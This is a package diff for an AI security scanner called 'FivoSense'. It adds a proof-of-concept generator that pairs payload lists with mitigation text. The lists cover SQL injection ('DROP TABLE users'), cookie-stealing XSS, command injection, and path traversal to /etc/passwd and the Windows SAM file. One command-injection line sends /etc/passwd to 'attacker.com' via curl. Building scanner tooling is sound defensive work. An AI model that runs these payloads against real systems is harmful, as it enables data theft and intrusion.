,CAAC,IAAI,CAAC,CAAC,CAAC,CAAC,IAAI,CAAC,IAAI,CAAC,CAAC,CAAC,CAAC,CAAC,eAAe,CAAC,IAAI,CAAC,CAAC,CAAC,CAAC,IAAI,CAAC,KAAK,CAAC,CAAC,CAAC,EAAE,CAAC;IACtF,CAAC;IAED,SAAS,aAAa,CAAC,IAAY;QACjC,IAAI,CAAC,CAAC,YAAY,CAAC,IAAI,CAAC;YAAE,OAAO,IAAI,CAAC,IAAI,CAAC;QAC3C,IAAI,CAAC,CAAC,kBAAkB,CAAC,IAAI,CAAC,EAAE,CAAC;YAC/B,MAAM,GAAG,GAAG,CAAC,CAAC,YAAY,CAAC,IAAI,CAAC,MAAM,CAAC,CAAC,CAAC,CAAC,IAAI,CAAC,MAAM,CAAC,IAAI,CAAC,CAAC,CAAC,EAAE,CAAC;YAChE,MAAM,IAAI,GAAG,CAAC,CAAC,YAAY,CAAC,IAAI,CAAC,QAAQ,CAAC,CAAC,CAAC,CAAC,IAAI,CAAC,QAAQ,CAAC,IAAI,CAAC,CAAC,CAAC,EAAE,CAAC;YACrE,OAAO,GAAG,GAAG,IAAI,IAAI,EAAE,CAAC;QAC1B,CAAC;QACD,OAAO,EAAE,CAAC;IACZ,CAAC;IAED,SAAS,eAAe,CAAC,IAAY;QACnC,MAAM,OAAO,GAA2C,EAAE,CAAC;QAC3D,IAAI,CAAC,CAAC,YAAY,CAAC,IAAI,CAAC,EAAE,CAAC;YACzB,MAAM,KAAK,GAAG,WAAW,CAAC,GAAG,CAAC,IAAI,CAAC,IAAI,CAAC,CAAC;YACzC,IAAI,KAAK;gBAAE,OAAO,CAAC,IAAI,CAAC,EAAE,OAAO,EAAE,IAAI,CAAC,IAAI,EAAE,KAAK,EAAE,CAAC,CAAC;QACzD,CAAC;aAAM,IAAI,CAAC,CAAC,iBAAiB,CAAC,IAAI,CAAC,EAAE,CAAC;YACrC,IAAI,CAAC,WAAW,CAAC,OAAO,CAAC,IAAI,CAAC,EAAE,CAAC,OAAO,CAAC,IAAI,CAAC,GAAG,eAAe,CAAC,IAAI,CAAC,CAAC,CAAC,CAAC;QAC3E,CAAC;aAAM,IAAI,CAAC,CAAC,kBAAkB,CAAC,IAAI,CAAC,EAAE,CAAC;YACtC,OAAO,CAAC,IAAI,CAAC,GAAG,eAAe,CAAC,IAAI,CAAC,IAAI,CAAC,EAAE,GAAG,eAAe,CAAC,IAAI,CAAC,KAAK,CAAC,CAAC,CAAC;QAC9E,CAAC;aAAM,IAAI,CAAC,CAAC,gBAAgB,CAAC,IAAI,CAAC,EAAE,CAAC;YACpC,IAAI,CAAC,SAAS,CAAC,OAAO,CAAC,GAAG,CAAC,EAAE,CAAC,CAAC,CAAC,CAAC,eAAe,CAAC,GAAG,CAAC,IAAI,OAAO,CAAC,IAAI,CAAC,GAAG,eAAe,CAAC,GAAG,CAAC,CAAC,CAAC,CAAC;QAClG,CAAC;QACD,OAAO,OAAO,CAAC;IACjB,CAAC;IAEA,QAAgB,CAAC,GAAG,EAAE;QACrB,kBAAkB,CAAC,IAAS;YAC1B,MAAM,EAAE,EAAE,EAAE,IAAI,EAAE,GAAG,IAAI,CAAC,IAAI,CAAC;YAC/B,IAAI,CAAC,CAAC,YAAY,CAAC,EAAE,CAAC,IAAI,IAAI,EAAE,CAAC;gBAC/B,MAAM,OAAO,GAAG,EAAE,CAAC,IAAI,CAAC;gBACxB,MAAM,aAAa,GAAG,QAAQ,CAAC,YAAY,CAAC,IAAI,CAAC,CAAC,CAAC;gBACnD,IAAI,aAAa,EAAE,CAAC;oBAClB,MAAM,IAAI,GAAG,OAAO,CAAC;wBACnB,EAAE,EAAE,SAAS,EAAE,EAAE,IAAI,EAAE,QAAQ,EAAE,IAAI,EAAE,OAAO,EAAE,KAAK,EAAE,YAAY,CAAC,IAAI,CAAC;wBACzE,GAAG,EAAE,IAAI,CAAC,IAAI,CAAC,GAAG,EAAE,aAAa;qBAClC,CAAC,CAAC;oBACH,WAAW,CAAC,GAAG,CAAC,OAAO,EAAE,EAAE,MAAM,EAAE,aAAa,EAAE,SAAS,EAAE,KAAK,EAAE,IAAI,EAAE,CAAC,CAAC;gBAC9E,CAAC;qBAAM,CAAC;oBACN,MAAM,cAAc,GAAG,eAAe,CAAC,IAAI,CAAC,CAAC;oBAC7C,IAAI,cAAc,CAAC,MAAM,GAAG,CAAC,EAAE,CAAC;wBAC9B,MAAM,UAAU,GAAG,cAAc,CAAC,CAAC,CAAC,CAAC,KAAK,CAAC;wBAC3C,WAAW,CAAC,GAAG,CAAC,OAAO,EAAE,EAAE,MAAM,EAAE,UAAU,CAAC,MAAM,EAAE,SAAS,EAAE,UAAU,CAAC,SAAS,EAAE,IAAI,EAAE,UAAU,CAAC,IAAI,EAAE,CAAC,CAAC;oBAClH,CAAC;gBACH,CAAC;YACH,CAAC;QACH,CAAC;QACD,cAAc,CAAC,IAAS;YACtB,MAAM,EAAE,MAAM,EAAE,SAAS,EAAE,IAAI,EAAE,GAAG,IAAI,CAAC,IAAI,CAAC;YAC9C,IAAI,UAAU,CAAC,GAAG,CAAC,aAAa,CAAC,MAAM,CAAC,CAAC,EAAE,CAAC;gBAC1C,IAAI,CAAC,OAAO,CAAC,CAAC,GAAQ,EAAE,EAAE;oBACxB,IAAI,CAAC,CAAC,YAAY,CAAC,GAAG,CAAC,EAAE,CAAC;wBACxB,MAAM,KAAK,GAAG,WAAW,CAAC,GAAG,CAAC,GAAG,CAAC,IAAI,CAAC,CAAC;wBACxC,IAAI,KAAK;4BAAE,KAAK,CAAC,SAAS,GAAG,IAAI,CAAC;oBACpC,CAAC;gBACH,CAAC,CAAC,CAAC;gBACH,OAAO;YACT,CAAC;YACD,MAAM,WAAW,GAAG,MAAM,CAAC,YAAY,CAAC,MAAM,CAAC,CAAC,CAAC;YACjD,IAAI,WAAW,EAAE,CAAC;gBAChB,MAAM,QAAQ,GAAG,OAAO,CAAC;oBACvB,EAAE,EAAE,SAAS,EAAE,EAAE,IAAI,EAAE,MAAM,EAAE,IAAI,EAAE,aAAa,CAAC,MAAM,CAAC;oBAC1D,GAAG,EAAE,IAAI,CAAC,IAAI,CAAC,GAAG,EAAE,WAAW;iBAChC,CAAC,CAAC;gBACH,IAAI,CAAC,OAAO,CAAC,CAAC,GAAQ,EAAE,EAAE;oBACxB,IAAI,CAAC,CAAC,eAAe,CAAC,GAAG,CAAC;wBAAE,OAAO;oBACnC,eAAe,CAAC,GAAG,CAAC,CAAC,OAAO,CAAC,CAAC,EAAE,KAAK,EAAE,EAAE,EAAE;wBACzC,KAAK,CAAC,UAAU,CAAC,IAAI,CAAC;4BACpB,MAAM,EAAE,KAAK,CAAC,IAAI,EAAE,IAAI,EAAE,QAAQ,EAAE,IAAI,EAAE,CAAC,KAAK,CAAC,IAAI,EAAE,QAAQ,CAAC;4BAChE,SAAS,EAAE,KAAK,CAAC,SAAS,EAAE,UAAU,EAAE,KAAK,CAAC,SAAS,CAAC,CAAC,CAAC,GAAG,CAAC,CAAC,CAAC,GAAG;yBACpE,CAAC,CAAC;oBACL,CAAC,CAAC,CAAC;gBACL,CAAC,CAAC,CAAC;YACL,CAAC;QACH,CAAC;KACF,CAAC,CAAC;IAEH,OAAO,KAAK,CAAC;AACf,CAAC;AAED,MAAM,UAAU,kBAAkB,CAAC,KAAoB;IACrD,OAAO,KAAK,CAAC,UAAU,CAAC,MAAM,CAAC,CAAC,CAAC,EAAE,CAAC,CAAC,CAAC,CAAC,SAAS,CAAC,CAAC;AACpD,CAAC;AAED,MAAM,UAAU,kBAAkB,CAAC,KAAoB,EAAE,QAAwC;IAC/F,OAAO,KAAK,CAAC,UAAU,CAAC,MAAM,CAAC,CAAC,CAAC,EAAE,CAAC,CAAC,CAAC,IAAI,CAAC,WAAW,EAAE,QAAQ,KAAK,QAAQ,CAAC,CAAC;AACjF,CAAC;AAED,MAAM,UAAU,eAAe,CAAC,IAAe;IAC7C,MAAM,SAAS,GAAG,GAAG,IAAI,CAAC,MAAM,CAAC,KAAK,KAAK,IAAI,CAAC,MAAM,CAAC,aAAa,EAAE,WAAW,GAAG,CAAC;IACrF,MAAM,OAAO,GAAG,GAAG,IAAI,CAAC,IAAI,CAAC,IAAI,KAAK,IAAI,CAAC,IAAI,CAAC,WAAW,EAAE,WAAW,GAAG,CAAC;IAC5E,OAAO,GAAG,SAAS,MAAM,OAAO,EAAE,CAAC;AACrC,CAAC"}
|
|
@@ -0,0 +1,26 @@
|
|
|
1
|
+
/**
|
|
2
|
+
* FivoSense - AI Security Scanner
|
|
3
|
+
* Copyright (c) 2026 thevinsoni
|
|
4
|
+
* Licensed under the MIT License
|
|
5
|
+
* https://github.com/thevinsoni/sense
|
|
6
|
+
*/
|
|
7
|
+
/**
|
|
8
|
+
* PoC Generator - Generate proof-of-concept exploits
|
|
9
|
+
*/
|
|
10
|
+
import { TaintTrace } from '../engine/taint.js';
|
|
11
|
+
export interface PoCTest {
|
|
12
|
+
category: string;
|
|
13
|
+
payload: string;
|
|
14
|
+
expectedBehavior: string;
|
|
15
|
+
testCode: string;
|
|
16
|
+
curlCommand?: string;
|
|
17
|
+
}
|
|
18
|
+
/**
|
|
19
|
+
* Generate PoC based on vulnerability type
|
|
20
|
+
*/
|
|
21
|
+
export declare function generatePoC(trace: TaintTrace): PoCTest;
|
|
22
|
+
/**
|
|
23
|
+
* Format PoC as markdown
|
|
24
|
+
*/
|
|
25
|
+
export declare function formatPoCMarkdown(poc: PoCTest): string;
|
|
26
|
+
//# sourceMappingURL=poc.d.ts.map
|
|
@@ -0,0 +1 @@
|
|
|
1
|
+
{"version":3,"file":"poc.d.ts","sourceRoot":"","sources":["../../src/engine/poc.ts"],"names":[],"mappings":"AAAA;;;;;GAKG;AAEH;;GAEG;AAEH,OAAO,EAAE,UAAU,EAAE,MAAM,oBAAoB,CAAC;AAEhD,MAAM,WAAW,OAAO;IACtB,QAAQ,EAAE,MAAM,CAAC;IACjB,OAAO,EAAE,MAAM,CAAC;IAChB,gBAAgB,EAAE,MAAM,CAAC;IACzB,QAAQ,EAAE,MAAM,CAAC;IACjB,WAAW,CAAC,EAAE,MAAM,CAAC;CACtB;AA8ID;;GAEG;AACH,wBAAgB,WAAW,CAAC,KAAK,EAAE,UAAU,GAAG,OAAO,CA6BtD;AAED;;GAEG;AACH,wBAAgB,iBAAiB,CAAC,GAAG,EAAE,OAAO,GAAG,MAAM,CAoBtD"}
|
|
@@ -0,0 +1,179 @@
|
|
|
1
|
+
/**
|
|
2
|
+
* FivoSense - AI Security Scanner
|
|
3
|
+
* Copyright (c) 2026 thevinsoni
|
|
4
|
+
* Licensed under the MIT License
|
|
5
|
+
* https://github.com/thevinsoni/sense
|
|
6
|
+
*/
|
|
7
|
+
/**
|
|
8
|
+
* Generate SQL injection PoC
|
|
9
|
+
*/
|
|
10
|
+
function generateSQLPoC(trace) {
|
|
11
|
+
const payloads = [
|
|
12
|
+
"' OR '1'='1",
|
|
13
|
+
"'; DROP TABLE users--",
|
|
14
|
+
"' UNION SELECT NULL, username, password FROM users--",
|
|
15
|
+
];
|
|
16
|
+
const payload = payloads[0];
|
|
17
|
+
return {
|
|
18
|
+
category: 'SQL Injection',
|
|
19
|
+
payload,
|
|
20
|
+
expectedBehavior: 'Bypasses authentication or extracts data',
|
|
21
|
+
testCode: `
|
|
22
|
+
// Test SQL Injection
|
|
23
|
+
const maliciousInput = "${payload}";
|
|
24
|
+
const query = "SELECT * FROM users WHERE id = '" + maliciousInput + "'";
|
|
25
|
+
// Expected: Query becomes: SELECT * FROM users WHERE id = '' OR '1'='1'
|
|
26
|
+
// Result: Returns all users (authentication bypass)
|
|
27
|
+
`,
|
|
28
|
+
curlCommand: trace.path.includes('req.')
|
|
29
|
+
? `curl -X POST http://localhost:3000/api/endpoint -d "id=${encodeURIComponent(payload)}"`
|
|
30
|
+
: undefined,
|
|
31
|
+
};
|
|
32
|
+
}
|
|
33
|
+
/**
|
|
34
|
+
* Generate XSS PoC
|
|
35
|
+
*/
|
|
36
|
+
function generateXSSPoC(trace) {
|
|
37
|
+
const payloads = [
|
|
38
|
+
'<script>alert(document.cookie)</script>',
|
|
39
|
+
'<img src=x onerror=alert(1)>',
|
|
40
|
+
'<svg onload=alert(1)>',
|
|
41
|
+
];
|
|
42
|
+
const payload = payloads[0];
|
|
43
|
+
return {
|
|
44
|
+
category: 'Cross-Site Scripting (XSS)',
|
|
45
|
+
payload,
|
|
46
|
+
expectedBehavior: 'Executes JavaScript in victim browser',
|
|
47
|
+
testCode: `
|
|
48
|
+
// Test XSS
|
|
49
|
+
const maliciousInput = "${payload}";
|
|
50
|
+
document.getElementById('output').innerHTML = maliciousInput;
|
|
51
|
+
// Expected: Script executes, shows alert with cookies
|
|
52
|
+
// Impact: Session hijacking, data theft
|
|
53
|
+
`,
|
|
54
|
+
curlCommand: trace.path.includes('req.')
|
|
55
|
+
? `curl "http://localhost:3000/page?name=${encodeURIComponent(payload)}"`
|
|
56
|
+
: undefined,
|
|
57
|
+
};
|
|
58
|
+
}
|
|
59
|
+
/**
|
|
60
|
+
* Generate Command Injection PoC
|
|
61
|
+
*/
|
|
62
|
+
function generateCommandPoC(trace) {
|
|
63
|
+
const payloads = [
|
|
64
|
+
'; cat /etc/passwd',
|
|
65
|
+
'| whoami',
|
|
66
|
+
'&& curl attacker.com/?data=$(cat /etc/passwd)',
|
|
67
|
+
];
|
|
68
|
+
const payload = payloads[0];
|
|
69
|
+
return {
|
|
70
|
+
category: 'Command Injection',
|
|
71
|
+
payload,
|
|
72
|
+
expectedBehavior: 'Executes arbitrary system commands',
|
|
73
|
+
testCode: `
|
|
74
|
+
// Test Command Injection
|
|
75
|
+
const maliciousInput = "file.txt${payload}";
|
|
76
|
+
exec(\`cat \${maliciousInput}\`);
|
|
77
|
+
// Expected: Runs: cat file.txt; cat /etc/passwd
|
|
78
|
+
// Result: Leaks system password file
|
|
79
|
+
`,
|
|
80
|
+
curlCommand: trace.path.includes('req.')
|
|
81
|
+
? `curl -X POST http://localhost:3000/api/command -d "file=test.txt${encodeURIComponent(payload)}"`
|
|
82
|
+
: undefined,
|
|
83
|
+
};
|
|
84
|
+
}
|
|
85
|
+
/**
|
|
86
|
+
* Generate Path Traversal PoC
|
|
87
|
+
*/
|
|
88
|
+
function generatePathTraversalPoC(trace) {
|
|
89
|
+
const payloads = [
|
|
90
|
+
'../../../etc/passwd',
|
|
91
|
+
'..\\..\\..\\windows\\system32\\config\\sam',
|
|
92
|
+
'....//....//....//etc/passwd',
|
|
93
|
+
];
|
|
94
|
+
const payload = payloads[0];
|
|
95
|
+
return {
|
|
96
|
+
category: 'Path Traversal',
|
|
97
|
+
payload,
|
|
98
|
+
expectedBehavior: 'Reads files outside intended directory',
|
|
99
|
+
testCode: `
|
|
100
|
+
// Test Path Traversal
|
|
101
|
+
const maliciousInput = "${payload}";
|
|
102
|
+
fs.readFile(\`/uploads/\${maliciousInput}\`, (err, data) => {
|
|
103
|
+
// Expected: Reads /etc/passwd instead of /uploads/file
|
|
104
|
+
// Result: Exposes sensitive system files
|
|
105
|
+
});
|
|
106
|
+
`,
|
|
107
|
+
curlCommand: trace.path.includes('req.')
|
|
108
|
+
? `curl "http://localhost:3000/download?file=${encodeURIComponent(payload)}"`
|
|
109
|
+
: undefined,
|
|
110
|
+
};
|
|
111
|
+
}
|
|
112
|
+
/**
|
|
113
|
+
* Generate NoSQL Injection PoC
|
|
114
|
+
*/
|
|
115
|
+
function generateNoSQLPoC(trace) {
|
|
116
|
+
const payload = '{"$gt": ""}';
|
|
117
|
+
return {
|
|
118
|
+
category: 'NoSQL Injection',
|
|
119
|
+
payload,
|
|
120
|
+
expectedBehavior: 'Bypasses authentication or extracts data',
|
|
121
|
+
testCode: `
|
|
122
|
+
// Test NoSQL Injection
|
|
123
|
+
const maliciousInput = ${payload};
|
|
124
|
+
db.collection('users').find({ username: req.body.username, password: maliciousInput });
|
|
125
|
+
// Expected: Query matches all documents (password always > "")
|
|
126
|
+
// Result: Authentication bypass
|
|
127
|
+
`,
|
|
128
|
+
curlCommand: trace.path.includes('req.')
|
|
129
|
+
? `curl -X POST http://localhost:3000/login -H "Content-Type: application/json" -d '{"username":"admin","password":${payload}}'`
|
|
130
|
+
: undefined,
|
|
131
|
+
};
|
|
132
|
+
}
|
|
133
|
+
/**
|
|
134
|
+
* Generate PoC based on vulnerability type
|
|
135
|
+
*/
|
|
136
|
+
export function generatePoC(trace) {
|
|
137
|
+
switch (trace.category.toLowerCase()) {
|
|
138
|
+
case 'sql':
|
|
139
|
+
return generateSQLPoC(trace);
|
|
140
|
+
case 'xss':
|
|
141
|
+
return generateXSSPoC(trace);
|
|
142
|
+
case 'command':
|
|
143
|
+
return generateCommandPoC(trace);
|
|
144
|
+
case 'path':
|
|
145
|
+
return generatePathTraversalPoC(trace);
|
|
146
|
+
case 'nosql':
|
|
147
|
+
return generateNoSQLPoC(trace);
|
|
148
|
+
default:
|
|
149
|
+
return {
|
|
150
|
+
category: trace.category,
|
|
151
|
+
payload: '<malicious-input>',
|
|
152
|
+
expectedBehavior: 'Exploits vulnerability',
|
|
153
|
+
testCode: `
|
|
154
|
+
// Generic test for ${trace.category}
|
|
155
|
+
const maliciousInput = "<malicious-input>";
|
|
156
|
+
// Test with malicious input to verify vulnerability
|
|
157
|
+
`,
|
|
158
|
+
};
|
|
159
|
+
}
|
|
160
|
+
}
|
|
161
|
+
/**
|
|
162
|
+
* Format PoC as markdown
|
|
163
|
+
*/
|
|
164
|
+
export function formatPoCMarkdown(poc) {
|
|
165
|
+
let md = `## ${poc.category} - Proof of Concept\n\n`;
|
|
166
|
+
md += `### Payload\n\`\`\`\n${poc.payload}\n\`\`\`\n\n`;
|
|
167
|
+
md += `### Expected Behavior\n${poc.expectedBehavior}\n\n`;
|
|
168
|
+
md += `### Test Code\n\`\`\`javascript${poc.testCode}\n\`\`\`\n\n`;
|
|
169
|
+
if (poc.curlCommand) {
|
|
170
|
+
md += `### HTTP Test\n\`\`\`bash\n${poc.curlCommand}\n\`\`\`\n\n`;
|
|
171
|
+
}
|
|
172
|
+
md += `### Mitigation\n`;
|
|
173
|
+
md += `- Use parameterized queries or prepared statements\n`;
|
|
174
|
+
md += `- Validate and sanitize all user input\n`;
|
|
175
|
+
md += `- Use allow-lists instead of block-lists\n`;
|
|
176
|
+
md += `- Apply principle of least privilege\n`;
|
|
177
|
+
return md;
|
|
178
|
+
}
|
|
179
|
+
//# sourceMappingURL=poc.js.map
|
|
@@ -0,0 +1 @@
|
|
|
1
|
+
{"version":3,"file":"poc.js","sourceRoot":"","sources":["../../src/engine/poc.ts"],"names":[],"mappings":"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"}
|
package/dist/engine/reach.d.ts
CHANGED
|
@@ -1,6 +1,8 @@
|
|
|
1
1
|
/**
|
|
2
|
-
*
|
|
3
|
-
*
|
|
2
|
+
* FivoSense - AI Security Scanner
|
|
3
|
+
* Copyright (c) 2026 thevinsoni
|
|
4
|
+
* Licensed under the MIT License
|
|
5
|
+
* https://github.com/thevinsoni/sense
|
|
4
6
|
*/
|
|
5
7
|
export interface ReachabilityResult {
|
|
6
8
|
reachableFunctions: Set<string>;
|
|
@@ -1 +1 @@
|
|
|
1
|
-
{"version":3,"file":"reach.d.ts","sourceRoot":"","sources":["../../src/engine/reach.ts"],"names":[],"mappings":"AAAA
|
|
1
|
+
{"version":3,"file":"reach.d.ts","sourceRoot":"","sources":["../../src/engine/reach.ts"],"names":[],"mappings":"AAAA;;;;;GAKG;AAcH,MAAM,WAAW,kBAAkB;IACjC,kBAAkB,EAAE,GAAG,CAAC,MAAM,CAAC,CAAC;IAChC,cAAc,EAAE,GAAG,CAAC,MAAM,CAAC,CAAC;IAC5B,WAAW,EAAE,MAAM,EAAE,CAAC;IACtB,cAAc,EAAE,MAAM,CAAC;IACvB,sBAAsB,EAAE,MAAM,CAAC;IAC/B,gBAAgB,EAAE,MAAM,CAAC;CAC1B;AAeD;;GAEG;AACH,wBAAgB,mBAAmB,CAAC,IAAI,EAAE,MAAM,GAAG,kBAAkB,CAiEpE;AA8BD,wBAAgB,oBAAoB,CAAC,CAAC,SAAS;IAAE,QAAQ,EAAE;QAAE,IAAI,EAAE,MAAM,CAAA;KAAE,CAAA;CAAE,EAC3E,KAAK,EAAE,CAAC,EAAE,EACV,YAAY,EAAE,kBAAkB,GAC/B,CAAC,EAAE,CAKL"}
|
package/dist/engine/reach.js
CHANGED
|
@@ -1,3 +1,9 @@
|
|
|
1
|
+
/**
|
|
2
|
+
* FivoSense - AI Security Scanner
|
|
3
|
+
* Copyright (c) 2026 thevinsoni
|
|
4
|
+
* Licensed under the MIT License
|
|
5
|
+
* https://github.com/thevinsoni/sense
|
|
6
|
+
*/
|
|
1
7
|
/**
|
|
2
8
|
* Reachability Analysis - Filters code to only entry-point reachable paths
|
|
3
9
|
* This reduces analysis surface by ~97% (OpenAnt research)
|